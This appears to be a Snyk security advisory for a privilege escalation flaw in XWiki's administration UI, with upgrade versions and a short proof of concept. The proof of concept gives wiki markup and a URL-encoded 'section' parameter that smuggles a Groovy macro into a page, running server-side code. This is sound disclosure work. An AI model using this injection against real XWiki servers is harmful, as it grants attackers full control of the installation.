Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade org.xwiki.platform:xwiki-platform-administration-ui
to version 13.10.11, 14.4.8, 14.10.1 or higher.
Affected versions of this package are vulnerable to Privilege Escalation by any user with edit rights on a page (including their own user page), who can execute arbitrary Groovy, Python or Velocity code via section ids in XWiki.AdminFieldsDisplaySheet
, leading to full access to the XWiki installation.
Add
{{template name="admin.vm" output="false"/}}
{{display reference="XWiki.AdminFieldsDisplaySheet"/}}
to any page where the user has edit rights, and supply
section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
as a URL parameter.